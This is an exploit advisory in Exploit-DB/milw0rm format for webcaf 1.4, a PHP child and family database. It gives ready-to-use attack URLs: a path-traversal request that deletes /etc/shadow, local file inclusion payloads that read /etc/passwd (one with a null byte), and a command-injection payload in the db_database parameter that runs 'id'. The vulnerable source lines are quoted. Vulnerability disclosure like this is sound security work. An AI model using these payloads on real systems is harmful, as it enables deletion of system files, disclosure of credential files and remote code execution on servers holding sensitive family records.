webcaf 1.4 - Local File Inclusion / Remote Code Execution

EDB-ID:

7388

CVE:



Author:

dun

Type:

webapps


Platform:

PHP

Date:

2008-12-08


  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 #########################################################
 #  [ webcaf <= 1.4 ]  Multiple Remote Vulnerabilities   #
 #########################################################
 #
 # Script: "WebCAF is a web-based child and family database developed by Head Start of Lane County..."
 #
 # Script site: http://www.webcaf.org/
 # Download: http://www.webcaf.net/downloads/webcaf-1.4.tar.gz
 #
 # [Arbitrary File Delete Vulnerability]
 # Vuln: http://site.com/webcaf/index.php?user_uid=../../../../../../etc/shadow ;)
 #
 # Bug: ./webcaf/index.php (lines: 49-50 and 61-63) 
 #
 # ...
 #	// Login, if necessary
 #	if (!$user_uid) include("modules/login.php");
 # ... 	 
 #	if ($_REQUEST[op] != "update") {
 #		if (file_exists("local/tmp/.$user_uid")) unlink("local/tmp/.$user_uid");
 #	}
 # ... 	 
 #
 #
 # [LFI] 
 # Vuln: http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd
 #		 http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd
 #
 # Bug: ./webcaf/index.php (lines: 68-131) 
 #
 # ...
 # 	switch ($_REQUEST[op]) {
 # ...
 #	case "forms":
 #		$_REQUEST[form] ? include("local/forms/$_REQUEST[form]") : include("modules/forms.php");	//LFI
 #		break;
 # ...
 #  case "reports":
 #		$_REQUEST[report] ? include("local/reports/$_REQUEST[report]") : include("modules/reports.php");  	//LFI
 #		break;
 # ...
 #  }
 # ... 	 
 #
 # Vuln: http://strcpy.pl/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00
 #
 # Bug: ./webcaf/modules/view.php (lines: 12-21) 
 #
 # ...
 #	if ($_REQUEST[view]) {
 # ...
 #  		include("views/$_REQUEST[view].php");	//LFI
 #	}
 # ... 	 
 #
 #
 # [RCE]
 # Vuln: http://site.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22
 #
 # Bug: ./webcaf/index.php (lines: 127) 
 #
 # ...
 # $str_result = system("$str_mysql --database=\"$_WEBCAF[db_database]\" --user=\"$_WEBCAF[db_username]\" --password=\"$_WEBCAF[db_password]\" --html --execute=\"status\"");
 # ... 	 
 #
 # and a lot of other bugz...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-12-08]